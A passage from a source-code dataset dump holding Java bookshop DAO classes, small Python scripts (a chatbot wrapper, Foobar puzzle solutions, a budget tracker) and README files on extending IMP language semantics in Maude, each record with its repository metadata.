"blob_id": "23b186d76d24cf1f9697f0fe1bdbdb1711a3b51f",
"content_id": "9936b93ce12b43664302566c54a4481eefa419db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 649,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 30,
"path": "/src/com/bookshop/service/impl/IdeaServiceImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.service.impl;\n\nimport com.bookshop.dao.impl.IdeaDaoImpl;\nimport com.bookshop.entity.Ideas;\nimport com.bookshop.service.IdeaService;\n\nimport java.util.List;\n\npublic class IdeaServiceImpl implements IdeaService {\n IdeaDaoImpl ideaDao=new IdeaDaoImpl();\n @Override\n public int insert(Ideas news) {\n return ideaDao.insert(news);\n }\n\n @Override\n public int delete(Integer id) {\n return ideaDao.delete(id);\n }\n\n @Override\n public int update(Ideas news) {\n return ideaDao.update(news);\n }\n\n @Override\n public List<Ideas> queryAll() {\n return ideaDao.queryAll();\n }\n}\n"
},
{
"alpha_fraction": 0.6619718074798584,
"alphanum_fraction": 0.7042253613471985,
"avg_line_length": 19.428571701049805,
"blob_id": "23d83a79cc82056c907e6b0a7a031588f2131e83",
"content_id": "2fd900cbda50b700936d331053a88ae74a7d483c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 7,
"path": "/charrobot/DEMO01/CS1/saying.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import test02\n\n\ndef say(keyword:str)->str:\n string= test02.res(test02.chatbot, keyword)\n return str(string)\n# print(say(\"开心点哈,一切都会好起来\"))"
},
{
"alpha_fraction": 0.5553170442581177,
"alphanum_fraction": 0.5592800378799438,
"avg_line_length": 34.20930099487305,
"blob_id": "1aef1c94e0e0a1a3a7e25d5715a9666847dc6f87",
"content_id": "b90aa27c4c4b4682f3a898207ac97f0f8554042c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6136,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 172,
"path": "/src/com/bookshop/dao/impl/OrderItemDaoImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao.impl;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport com.bookshop.dao.OrderItemDao;\nimport com.bookshop.entity.OrderItem;\nimport com.bookshop.util.JDBCUtils;\n\npublic class OrderItemDaoImpl implements OrderItemDao {\n\n @Override\n public int insert(OrderItem orderItem) {\n String sql = \"INSERT INTO `Orderitem` (`user_id`, `book_id`, `order_id`, `price_sum`) VALUES (?, ?, ?, ?)\";\n // 获取连接\n Connection connection = JDBCUtils.getConnection();\n // 语句执行平台\n PreparedStatement preparedStatement = null;\n // 记录受影响的行数\n int result = 0;\n try {\n // 获得预编译对象后\n preparedStatement = connection.prepareStatement(sql);\n // 给?赋值\n preparedStatement.setInt(1, orderItem.getUserId());\n preparedStatement.setInt(2, orderItem.getBookId());\n preparedStatement.setInt(3, orderItem.getOrderId());\n preparedStatement.setDouble(4, orderItem.getPriceSum());\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n // 资源的关闭\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n // 对结果的处理\n return result;\n }\n\n @Override\n public int delete(Integer id) {\n String sql = \"DELETE FROM `Orderitem` WHERE `id` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n int result = 0;\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setInt(1, id);\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return result;\n }\n\n @Override\n public int update(OrderItem orderItem) {\n // \"INSERT INTO `Order_item` (`user_id`, `book_id`, `order_id`,\n // `price_sum`) VALUES (?, ?, ?, ?)\";\n String sql = \"UPDATE `Orderitem` SET `user_id` = ?, `book_id` = ?, `order_id` = ?, `price_sum` = ? WHERE `id` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n int result = 0;\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setInt(1, orderItem.getUserId());\n preparedStatement.setInt(2, orderItem.getBookId());\n preparedStatement.setInt(3, orderItem.getOrderId());\n preparedStatement.setDouble(4, orderItem.getPriceSum());\n preparedStatement.setInt(5, orderItem.getId());\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return result;\n }\n\n @Override\n public List<OrderItem> queryAll() {\n String sql = \"SELECT * FROM bookshop.`Orderitem`\";\n List<OrderItem> list = new ArrayList<OrderItem>();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n resultSet = preparedStatement.executeQuery();\n\n while (resultSet.next()) {\n OrderItem orderItem = new OrderItem();\n orderItem.setId(resultSet.getInt(1));\n orderItem.setUserId(resultSet.getInt(2));\n orderItem.setBookId(resultSet.getInt(3));\n orderItem.setOrderId(resultSet.getInt(4));\n orderItem.setPriceSum(resultSet.getDouble(5));\n list.add(orderItem);\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return list;\n }\n\n @Override\n public List<OrderItem> queryByUserId(Integer userId) {\n String sql = \"SELECT * FROM `Orderitem` WHERE `user_id` = ?\";\n List<OrderItem> list = new ArrayList<OrderItem>();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setInt(1, userId);\n resultSet = preparedStatement.executeQuery();\n\n while (resultSet.next()) {\n OrderItem orderItem = new OrderItem();\n orderItem.setId(resultSet.getInt(1));\n orderItem.setUserId(resultSet.getInt(2));\n orderItem.setBookId(resultSet.getInt(3));\n orderItem.setOrderId(resultSet.getInt(4));\n orderItem.setPriceSum(resultSet.getDouble(5));\n list.add(orderItem);\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return list;\n }\n\n}\n"
},
{
"alpha_fraction": 0.5317604541778564,
"alphanum_fraction": 0.8330308794975281,
"avg_line_length": 33.5,
"blob_id": "00d64bb2ba4c7f93bbd85c19061a4083dcf8ebbe",
"content_id": "e2494123cdd6735cd1f3ea2e109f65f17a3b4c1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 617,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 16,
"path": "/charrobot/DEMO01/CS1/使用说明.md",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "使用说明\n 1.首先运行服务端\n\n\n\n\n\n\n\n\n\n 2.然后运行客户端,根据客户端的提示进行功能的选择\n\n\n\n"
}
] | 40 |
griftheorange/Foobar-Challenge | https://github.com/griftheorange/Foobar-Challenge | 21dd34066b76b83a0c054a5f52834e47c6ef5b81 | 0adf5c28ad0f38874b38e7fe638db0bcbe574f04 | 8ba6162d90bc5617ad4457782a7427a9388e305a | refs/heads/master | 2022-08-06T22:58:59.961158 | 2020-05-28T17:36:05 | 2020-05-28T17:36:05 | 267,654,842 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4912768602371216,
"alphanum_fraction": 0.5180783867835999,
"avg_line_length": 28.969696044921875,
"blob_id": "52f9ba2465f6cc91facc1abf681416a11623181e",
"content_id": "5079e2596ea47cc7899cf2acf07b751d5af849f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3955,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 132,
"path": "/solution.py",
"repo_name": "griftheorange/Foobar-Challenge",
"src_encoding": "UTF-8",
"text": "import math\n\n# find the sub-squares of an area\ndef solution1(area):\n square_array = []\n while(area > 0):\n for i in range(area, 0, -1):\n if area > 3:\n root = math.sqrt(i)\n if int(root + 0.5) ** 2 == i:\n square_array.append(i)\n area -= i\n break\n elif area > 0:\n square_array.append(1)\n area -= 1\n return square_array\n \n\ndef solution2(xs):\n if(len(xs) == 1):\n return str(xs[0])\n \n pos_nums = []\n neg_nums = []\n exclusions = []\n max_neg_index = None\n\n # sort numbers into appropriate bins, tracks index of max negative value encountered\n for i in range(len(xs)):\n if(xs[i] > 0):\n pos_nums.append(xs[i])\n elif(xs[i] < 0):\n if(max_neg_index == None):\n max_neg_index = len(neg_nums)\n else:\n if(xs[i] > neg_nums[max_neg_index]):\n max_neg_index = len(neg_nums)\n neg_nums.append(xs[i])\n else:\n exclusions.append(xs[i])\n \n # if no positive values and less than two negative values, handles edge cases\n if(len(pos_nums) == 0 and len(neg_nums) <= 1):\n if(len(neg_nums) == 0):\n return '0'\n else:\n if(len(exclusions) > 0):\n return '0'\n else:\n return str(neg_nums[0])\n\n # deletes max negative value if sign switch is needed\n if(len(neg_nums)%2 != 0):\n del neg_nums[max_neg_index]\n \n #second traversal calculates product\n product = 1\n for i in range(len(pos_nums)):\n product *= pos_nums[i]\n for i in range(len(neg_nums)):\n product *= neg_nums[i]\n \n\n return str(product)\n\ndef solution3(n, b):\n \n # support function for generating new minion id from existing id, calls sort_digits and str_base\n def get_new_id(n, base):\n vars = sort_digits(n)\n str_length = len(n)\n z = int(vars['x'], base) - int(vars['y'], base)\n base_converted_value = str_base(z, base)\n while(len(base_converted_value) < str_length):\n base_converted_value = '0'+base_converted_value\n return base_converted_value\n\n # support function for sorting the digits of an id and storing the values\n def sort_digits(string):\n int_arr = []\n for i in range(len(string)):\n int_arr.append(string[i])\n int_arr.sort()\n var_hash = {}\n var_hash['y'] = \"\".join(list(int_arr))\n var_hash['x'] = \"\".join(list(reversed(int_arr)))\n return var_hash\n\n # support function for converting numbers to strings in the provided base\n def str_base(number,base):\n if number < 0:\n return '-' + str_base(-number,base)\n else:\n (d,m) = divmod(number,base)\n if d:\n return str_base(d,base) + chr(ord('0') + m)\n else:\n return chr(ord('0') + m)\n \n id_arr = [n]\n # endlessly gets new minion id, reverses through list to find a previous number equal to new id, increments distance\n # if a match is found, loop broken and distance returned\n while True:\n n = get_new_id(n, b)\n id_arr.append(n)\n distance = 0\n for j in reversed(range(len(id_arr)-1)):\n distance += 1\n if(id_arr[j] == n):\n return distance\n \n \n\n\n \n\nprint(solution3('1211', 10))\nprint(solution3('210022', 3))\n\n# print(solution2([2, 0, 2, 2, 0]))\n# print(solution2([-2, -3, 4, -5]))\n# print(solution2([2, -3, 1, 0, -5]))\n# print(solution2([0]))\n# print(solution2([-1]))\n# print(solution2([-1, 1, 0]))\n# print(solution2([-1, 1, 2, 0]))\n# print(solution2([-1, 0]))\n# print(solution2([-5, -5, -5, -5]))\n# print(solution2([-5, -5, -5, -5, -5]))\n# print(solution2([-5, -5, -5, -5, -5, -5]))\n# print(solution2([0, 0, 0, 0, 0]))"
}
] | 1 |
aglorioso722/Python-Projects | https://github.com/aglorioso722/Python-Projects | 64d380d54d0decb79a9c09eb21e3bb7a83ecb30f | 6a132d62e69244041e10fda8265926491211a34e | a20723a24d657944f19216b2e3f40add1b7423cc | refs/heads/master | 2020-06-17T22:02:12.073808 | 2019-08-08T20:48:24 | 2019-08-08T20:48:24 | 196,073,038 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5592960715293884,
"alphanum_fraction": 0.5631216764450073,
"avg_line_length": 20.824562072753906,
"blob_id": "c26ac645f18cdc0831ee14e8f14f0aea20d0be7a",
"content_id": "7c9c84731252bb4885420178e7d1d6be22b36543",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1307,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 57,
"path": "/Budget Tracker.py",
"repo_name": "aglorioso722/Python-Projects",
"src_encoding": "UTF-8",
"text": "#Budget Tracker Project Andrew Glorioso\r\nclass Budget:\r\n def __init__(self,income=0,expenses=0,netFlow=0):\r\n self.income=income\r\n self.expenses=expenses\r\n self.netFlow=netFlow\r\n # Prints a table of Income, Expenses, Recurring Costs, and Net flow\r\n def __str__(self):\r\n return f\"Income: {self.income}\\nExpenses: {self.expenses} \"\r\n\r\n def get_income(self):\r\n self.income=int(input(\"Monthly Income: \"))\r\n return self.income\r\n\r\n def get_expenses(self):\r\n total=0\r\n x=int(input(\"Enter number of expenses: \"))\r\n expenselist = []\r\n for i in range(x):\r\n i += 1\r\n name=input(f\"Expense # {i}: \")\r\n cost=int(input(f\"Cost of {name}:$ \"))\r\n expenselist.append(cost)\r\n self.expenses=sum(expenselist)\r\n return self.expenses\r\n\r\n def get_net_flow(self):\r\n self.net_Flow = self.income-self.expenses\r\n if self.income>self.expenses:\r\n print(f\"Net gain of {self.net_Flow}\")\r\n elif self.income<self.expenses:\r\n print(f'Net loss of {self.net_Flow}')\r\n return self.net_Flow\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Instantantiate the object\r\nHouse=Budget()\r\n\r\nHouse.get_income()\r\nHouse.get_expenses()\r\nprint(House)\r\nHouse.get_net_flow()\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.7772511839866638,
"alphanum_fraction": 0.7772511839866638,
"avg_line_length": 69.33333587646484,
"blob_id": "252f471be9101aa7d96b81e645fdbd28e4c2e68e",
"content_id": "cbe445a9c144fb51e1e45dc28d7f6905bef7344f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 3,
"path": "/README.md",
"repo_name": "aglorioso722/Python-Projects",
"src_encoding": "UTF-8",
"text": "# Python-Projects\n</b> Budget Tracker <b/>\nApplication used to keep track of a household's budget. Accepts income and expenses from the user and returns how much they are saving or losing over a period of time.\n"
}
] | 2 |
brando90/cs522 | https://github.com/brando90/cs522 | 53836fb3cbaaf2169ed52c4d8747d5c672b587ef | 47069124f4ea6e70dc59cf2556d6759c5943c957 | fa1bd4b291100cbf39e9ebf539068d346031aaf3 | refs/heads/master | 2021-09-30T23:54:40.947202 | 2018-11-26T03:42:39 | 2018-11-26T03:42:39 | 149,047,248 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6624240875244141,
"alphanum_fraction": 0.6661845445632935,
"avg_line_length": 52.870967864990234,
"blob_id": "4bbc1f9041b224f2e58fcaf3c37581ac3e75204c",
"content_id": "f12c8665307f7e3a1deb0f72513487d74483c13b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 3457,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 62,
"path": "/HW3/imp/4-imp-threads/3-imp-smallstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": " --\r\n Small-step SOS: Adding dynamic threads to IMP \r\n --\r\n\r\nSuggested steps to follow in order to extend the oringinal small-step SOS\r\nof IMP in Maude to include dynamic threads:\r\n\r\n1) Modify imp-smallstep.maude: Add Maude commands for executing the new\r\n programs.\r\n\r\n2) Run imp-smallstep.maude: Everything working before should still work;\r\n the new programs should get stuck on their first attempt to spawn a thread.\r\n\r\n3) Modify imp-semantics-smallstep.maude:\r\n a) Add the two small-step SOS rules propagating the reduction permission\r\n from S to spawn S and from S2 to spawn S1 S2;\r\n b) Add the small-step SOS rule reducing spawn {} to {};\r\n c) Add the structural equation enforcing right associativity of sequential\r\n composition.\r\n d) Add the syntactic extension of spawn to take a Stmt as argument.\r\n See below for explanations on why that is needed.\r\n\r\n7) Run imp-smallstep.maude and check that all programs evaluate properly.\r\n\r\n\r\n \r\n Observations, thoughts \r\n \r\n\r\n1) The propagation rules and the rule for dissolving threads are normal.\r\n\r\n2) However, we also had to add a structural equation for enforcing right associativity of sequential\r\n composition. This equation is an artifact of the new dynamic threads feature (to keep the\r\n definition of the latter simpler and modular) and does not involve the new syntax (spawn).\r\n3) Also, we had to add the extension of spawn to statement argument:\r\n op spawn_ : Stmt -> Stmt [ditto] .\r\n Without it, no program with spawn will work. The reason is actually quite\r\n indirect. It is because of the rule for blocks\r\n rl o < {S},Sigma > => < S,Sigma > .\r\n which changes the type of code from Block to Stmt. Once that rule\r\n applies to the argument block of spawn, that block becomes a statement\r\n and then spawn does not parse as a statement anymore. Thus the rule\r\n for \"* Cfg\" will not apply. An alternative to extending the syntax is to\r\n attempt to change the rule for blocks as follows:\r\n crl o < {S},Sigma > => < {S'},Sigma' > if o < S,Sigma > => < S',Sigma' > .\r\n rl o < {{}},Sigma > => < {},Sigma > .\r\n Besides (significantly) decreasing the performance of the overall\r\n definition (try it!), this attempt raises other problems, which either\r\n require more extensive changes to the definition or result in loss of\r\n behavior. For example, we would like {spawn S1} S2 to allow S2 to reduce,\r\n similarly to the second rule for spawn above. In general, we would need a\r\n syntactic check that the first statement in a sequential composition can\r\n allow the second statement to reduce, which is tedious and non-modular.\r\n An alternative to replacing the rule for blocks is to change the first\r\n rule of spawn above to only reduce the inside statement of its block\r\n argument:\r\n crl o < spawn {S},Sigma > => < spawn {S'},Sigma' > if o < S,Sigma > => < S',Sigma' > .\r\n In this case, one more spawn elimination rule would be needed:\r\n rl o < spawn {{}},Sigma > => < {},Sigma > .\r\n Unfortunately, this solution would make the semantics of a language\r\n construct, spawn, to non-modularly depend upon and involve another\r\n construct, {_} (e.g., what if we add more constructs for blocks later on?).\r\n "
},
{
"alpha_fraction": 0.6063596606254578,
"alphanum_fraction": 0.6151315569877625,
"avg_line_length": 39.45454406738281,
"blob_id": "cee3fc48381f15f0e5e321d4e7b55bcc5c1806d0",
"content_id": "1b1efa25ceffbffb1ca88f39de6c50816187c027",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 912,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 22,
"path": "/HW4/imp/1-imp-increment/7-imp-cham/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "----------------------------------------------\r\n--- CHAM: Adding variable increment to IMP ---\r\n----------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal CHAM of IMP in Maude\r\nto include variable increment:\r\n\r\n1) Modify imp-cham.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-cham.maude: Everything working before should still work;\r\n the new programs should get stuck on the first statement involving increment.\r\n\r\n3) Modify imp-semantics-cham.maude: Add the actual CHAM semantics of increment (one rule).\r\n\r\n4) Run imp-cham.maude and check that all programs evaluate properly;\r\n notice the three different ways (x is 1, 2, or 3) in which nondetPgm evaluates.\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the rule for increment. Nothing else changed.\r\n"
},
{
"alpha_fraction": 0.6456456184387207,
"alphanum_fraction": 0.6501501798629761,
"avg_line_length": 39.625,
"blob_id": "6a1544a1a21e04c77fb8c4b078e7b09582bd9fc2",
"content_id": "7f770b2414313a644bf642af9691928c8e483523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1332,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 32,
"path": "/HW4/imp_pp/5-imp-locals/4-imp-denotational/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "---------------------------------------------------\r\n--- Denotational: Adding local variables to IMP ---\r\n---------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original denotational\r\nsemantics of IMP in Maude to include local variables:\r\n\r\n1) Modify imp-denotational.maude: Modify the previous Maude commands for\r\n programs to instead apply their denotation as statements on states\r\n that initialize all the purposely undeclared variables.\r\n\r\n2) Run imp-denotational.maude: None of the existing programs can be evaluated,\r\n because of the missing denotational semantics for let\r\n (note the subterms of the form [[let x = a in s]]).\r\n\r\n3) Modify imp-semantics-denotational.maude:\r\n a) Add an equation for the denotational semantics of let.\r\n b) Remove the previous equation for programs,\r\n because programs are just statements now.\r\n\r\n4) Run imp-denotational.maude and check that all programs evaluate properly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Simple and modular.\r\n\r\n2) The rule for let is a bit tricky, in that the state after the block is\r\n made to be undefined in X if so it was before the block. This works because\r\n of how the state update operation was defined (see state.maude).\r\n"
},
{
"alpha_fraction": 0.6947861909866333,
"alphanum_fraction": 0.6983011364936829,
"avg_line_length": 48.20588302612305,
"blob_id": "a050b6209455130e6eecdba54747965dce7fdda4",
"content_id": "9f12a334ef082e3264c0f6120bbcae40e91dd510",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1707,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 34,
"path": "/HW4/imp/4-imp-threads/4-imp-denotational/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "---------------------------------------------------\r\n--- Denotational: Adding dynamic threads to IMP ---\r\n---------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original denotational\r\nsemantics of IMP in Maude to include dynamic threads:\r\n\r\n1) Modify imp-denotational.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-denotational.maude: Everything working before should still work;\r\n the new programs should be partially reduced to some functional representations;\r\n these functional representations cannot be reduced all the way through because\r\n of the missing denotation of threads (note the subterms of the form [[spawn s]]).\r\n\r\n3) Add the actual denotational semantics of increment, which consists of one equation\r\n essentially discarding the spawn and keeping the statement in place. This means\r\n that there will be no threads, spawn s being the same as s. Unfortunately,\r\n non-determinism cannot be supported with our current mathematical domains,\r\n and changing the domains to support non-determinism is non-trivial because\r\n power domains are required and leads to rather inefficient interpreters.\r\n\r\n4) Run imp-denotational.maude and check that all programs evaluate properly;\r\n notice the all programs are determinstic, including spawnPgm.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Trivial but useless.\r\n\r\n2) One may consider defining and using power domains to define a denotational\r\n semantics that collects all the evaluation results. However, that would still\r\n not capture properly all the interleavings, same like big-step SOS.\r\n"
},
{
"alpha_fraction": 0.6049237847328186,
"alphanum_fraction": 0.6107854843139648,
"avg_line_length": 35.08695602416992,
"blob_id": "6d1d24f7e2297a55289bfb01a4136ca5f5c14ab4",
"content_id": "f1bf5fce3bcb294b1dfedf9d0489264c499b476f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 23,
"path": "/imp/4-imp-threads/7-imp-cham/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "-------------------------------------------\r\n--- CHAM: Adding dynamic threads to IMP ---\r\n-------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal CHAM of IMP\r\nin Maude to include dynamic threads:\r\n\r\n1) Modify imp-cham.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-cham.maude: Everything working before should still work;\r\n the new programs should get stuck on the first attempt to spawn a thread.\r\n\r\n3) Modify imp-semantics-cham.maude: Add the actual CHAM semantics of\r\n thread creation and termination.\r\n\r\n4) Run imp-cham.maude and check that all programs evaluate properly.\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) We only had to add the rules for spawning and collecting threads.\r\n Nothing else changed.\r\n"
},
{
"alpha_fraction": 0.6947580575942993,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 51.89130401611328,
"blob_id": "15be7127344151555fde2ebe6784db1eb364bc69",
"content_id": "d5907746c6574a998f971f61c2de5805b38539a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2480,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 46,
"path": "/imp/3-imp-halting/1-imp-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "------------------------------------------------------\r\n--- Big-step SOS: Adding abrupt termination to IMP ---\r\n------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the oringinal big-step SOS\r\nof IMP in Maude to include abrupt termination:\r\n\r\n1) Modify imp-bigstep.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-bigstep.maude: Everything working before should still work;\r\n the new programs should stay unchanged (big-step SOS either reduces a program\r\n all the way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-semantics-bigstep.maude:\r\n a) Add two new result configurations to mark the two halting situations.\r\n b) For each existing big-step SOS rule having n premises, add n additional\r\n big-step SOS rules, one for each premise potentially halting, each propgating\r\n\t the halting situation of that premise through the corresponding construct.\r\n\r\n4) Run imp-bigstep.maude: Everything working before should still work the same way;\r\n the new programs should still stay unchanged, that is, unevaluated.\r\n ATTENTION: the new big-step SOS is very slow, so you may need to replace 100 by 2.\r\n\r\n6) Add the actual big-step SOS of division by zero and halt, each consisting of one rule.\r\n\r\n7) Run imp-bigstep.maude and check that all programs evaluate properly,\r\n resulting in configurations that look the same way no matter whether the\r\n program was terminated normally or abruptly.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Result expression configurations had to change in order to capture the side effects.\r\n\r\n2) Every existing conditional rule generated new rules, one for each premise.\r\n\r\n3) The resulting big-step SOS is VERY slow in search mode and can be very slow in rewrite\r\n mode, too, if the search in conditions happen to not find the desired path immediately.\r\n This is NOT a problem of our Maude implementation, it is a problem of big-step SOS.\r\n Many think of big-step SOS almost as if it is defining an interpreter. That is wrong\r\n in general. It happens to be an interpreter when one's rules are deterministic,\r\n syntax-driven. Otherwise, a complex search may be needed. Indeed, big-step SOS is not\r\n telling how to execute the program; it only tells you what is possible. Maude helps to\r\n some extent to implement the \"how\", but one should not expect magic in general.\r\n "
},
{
"alpha_fraction": 0.6785237789154053,
"alphanum_fraction": 0.6843041181564331,
"avg_line_length": 46.89130401611328,
"blob_id": "c573068c7889aa52c5af67d26f714c0097d82695",
"content_id": "ab16feff33b7e29a66147d78aa4571ae48cbdbe5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 2249,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 46,
"path": "/HW3/imp/1-imp-increment/1-imp-bigstep/README.txt",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "------------------------------------------------------\r\n--- Big-step SOS: Adding variable increment to IMP ---\r\n------------------------------------------------------\r\n\r\nSuggested steps to follow in order to extend the original big-step SOS\r\nof IMP in Maude to include variable increment:\r\n\r\n1) Modify imp-bigstep.maude: Add Maude commands for executing the new programs.\r\n\r\n2) Run imp-bigstep.maude: Everything working before should still work;\r\n the new programs should stay unchanged (big-step SOS either reduces a program\r\n all the way through, or it does not reduce it at all).\r\n\r\n3) Modify imp-semantics-bigstep.maude:\r\n a) Comment out configurations holding only one value.\r\n The remaining configurations include all what we need.\r\n b) Modify the existing semantic rules to work with the new configurations,\r\n making sure that side effects are properly propagated.\r\n c) Eliminate rules < I,Sigma > => < I,Sigma > and < T,Sigma > => < T,Sigma >\r\n (they are unnecessary and lead to non-termination).\r\n d) Add two new rules for the non-deterministic choice strategy of + and /;\r\n recall that fully non-deterministic evaluation cannot be done in big-step.\r\n\r\n4) Run imp-bigstep.maude: Everything working before should still work the same way;\r\n the new programs should still stay unchanged, that is, unevaluated.\r\n\r\n6) Add the actual big-step SOS of increment, which consists of one rule.\r\n\r\n7) Run imp-bigstep.maude and check that all programs evaluate properly;\r\n notice the three different ways (x is 1, 2, or 3) in which nondetPgm evaluates.\r\n\r\n\r\n------------------------------\r\n--- Observations, thoughts ---\r\n------------------------------\r\n\r\n1) Result expression configurations had to change in order to capture the side effects.\r\n\r\n2) Consequently, every rule involving the evaluation of any expression had to change\r\n in order to accommodate the new configurations and propagate side effects.\r\n\r\n3) Since the left-hand and the righ-hand configurations are the same now,\r\n to avoid non-termination we had to eliminate some rules of the form R => R.\r\n\r\n4) New rules had to be added to capture the non-deterministic evaluation\r\n strategy, but still only non-deterministic choice could be defined.\r\n"
},
{
"alpha_fraction": 0.4583333432674408,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 11,
"blob_id": "c2c43028fe14bdb2a77f5f9022b3b197de4b1fa6",
"content_id": "2f692cb3e2fdf82c6e17612f0f706858a823d859",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 2,
"path": "/README.md",
"repo_name": "brando90/cs522",
"src_encoding": "UTF-8",
"text": "# cs522\n# cs522_project\n"
},
{
"alpha_fraction": 0.6409848928451538,
"alphanum_fraction": 0.6449562907218933,
"avg_line_length": 39.96666717529297,
"blob_id": "fb8d72f0de445ded342399e76363416eeca68c8c",
"content_id": "2eccf975a1264125aa282064a160b2f9fb6062ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 30,
